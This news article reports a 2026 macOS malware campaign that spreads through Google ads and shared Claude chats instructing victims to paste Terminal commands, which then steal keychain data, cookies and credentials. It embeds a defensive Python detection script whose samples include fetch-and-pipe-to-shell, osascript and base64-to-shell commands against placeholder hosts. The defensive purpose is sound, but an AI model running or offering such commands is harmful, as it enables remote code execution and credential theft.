Cybercriminals hide malware in public Claude AI chats to steal credentials on Mac

Attackers use Google ads and Claude AI chats to distribute malware on Mac. The code runs in memory, steals credentials and cookies, and changes with each download to evade antivirus.

14 May 2026, 08:02

A new cybercrime campaign targeting Mac computers uses Google ads and manipulated public Claude AI chats to distribute malware. The lure is especially hard to detect because the links lead to real claude.ai pages, which then redirect to shared conversations containing fake instructions to run commands in Terminal.

The paradox of the campaign lies in its use of legitimate services to hide the attack. Cybercriminals no longer need fraudulent domains to appear trustworthy; instead they exploit public features of artificial intelligence platforms to host malicious commands.

Ads lead to public chats that instruct victims to run commands in Terminal

The command the victim is told to run downloads malicious scripts and executes them directly in memory using shell scripts and native macOS tools. This technique leaves few visible traces on disk and makes detection harder for the user.

The code also uses osascript, macOS's script automation tool, to launch remote instructions without installing a traditional program. Researchers have identified at least two variants of the campaign, each with distinct infrastructure and domains hosting the payloads.

Delivery is also polymorphic: the payload changes on each download to make antivirus detection harder. In recent months, similar campaigns using shared conversations on platforms such as ChatGPT and Grok had already been detected.
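Defenders typically hunt for exactly the execution pattern described above: a command pasted into Terminal that fetches a script from the network and pipes it straight into a shell, decodes an embedded payload into a shell, or bridges into a shell through osascript. The following Python script is an added example, not code from the article or from the researchers it cites. It applies a handful of regular-expression heuristics to constructed sample command lines (the domains and commands are made up) of the kind a shell-history collector or an EDR's process-command telemetry would produce.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample command lines (hypothetical hosts under .invalid), as a
# shell-history or process-execution collector on a Mac might record them.
SAMPLE_COMMANDS = [
    "git status",
    "curl -fsSL https://updates.example.invalid/setup.sh | bash",
    "osascript -e 'do shell script \"curl -s https://cdn.example.invalid/p | sh\"'",
    "echo aGVsbG8= | base64 -d | sh",
    "brew install wget",
    'nohup bash -c "$(curl -s https://files.example.invalid/x)" &',
]

# Heuristic rules for the "paste this into Terminal" technique: each pairs a
# short rule name with a compiled pattern over the full command line.
RULES = [
    # Script fetched over the network and piped directly into a shell.
    ("remote-script-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    # osascript used as a bridge into a shell command.
    ("osascript-shell-bridge",
     re.compile(r"\bosascript\b.*do shell script")),
    # Base64-decoded content piped into a shell (payload never touches disk).
    ("decoded-payload-piped-to-shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b")),
    # Command substitution whose body is a network download.
    ("command-substitution-from-network",
     re.compile(r"\$\(\s*(curl|wget)\b")),
]


@dataclass
class Finding:
    rule: str
    command: str


def scan_command(cmd: str) -> List[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, pattern in RULES if pattern.search(cmd)]


def scan_commands(cmds: List[str]) -> List[Finding]:
    """Run every rule over every command line and collect the hits."""
    return [Finding(rule, cmd) for cmd in cmds for rule in scan_command(cmd)]


def summarize(cmds: List[str]) -> dict:
    """Count hits per rule; useful as a quick triage view over a history file."""
    counts = {name: 0 for name, _ in RULES}
    for finding in scan_commands(cmds):
        counts[finding.rule] += 1
    return counts


if __name__ == "__main__":
    for finding in scan_commands(SAMPLE_COMMANDS):
        print(f"[{finding.rule}] {finding.command}")
    print(summarize(SAMPLE_COMMANDS))
```

These rules are triage signals, not verdicts: a legitimate installer that documents a `curl ... | bash` one-liner will trip the first rule just as the campaign's command does, so in practice they are paired with an allowlist of approved installers and reviewed alongside what the process did next (network destinations, keychain access, files written).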

Malware steals macOS keychain data, cookies, and credentials

Once running, the malware collects browser cookies, saved credentials, macOS keychain data, the device name, the external IP address, the operating system version, and the keyboard locale. It then sends this data to servers controlled by the attackers.

Much of the risk lies in the access to cookies and browser data, since stolen session cookies allow authentication on online services and corporate platforms to be bypassed. That access also extends to the cloud-based work tools used in professional environments.

One of the variants shows similarities to the MacSync malware. The code also checks the keyboard layout and halts its execution if it detects layouts associated with Russia or countries of the Commonwealth of Independent States.

The recommendation is to go to the official Anthropic website manually

The main advice for avoiding infection is not to download software from sponsored ads. It is also advisable to go to the official Anthropic site manually to install Claude, and to distrust any guide that asks you to copy and paste commands into Terminal.

The campaign confirms a shift in how malware is distributed on Mac: the instructions are hosted inside well-known services rather than on fake pages built for deception. Attackers thus use the platform's own public features to lend the infection process a legitimate appearance.

Among the data sought by the malware are macOS keychain information along with browser cookies, saved credentials, external IP address, device name, operating system version, and keyboard locale.

About the author
Redacción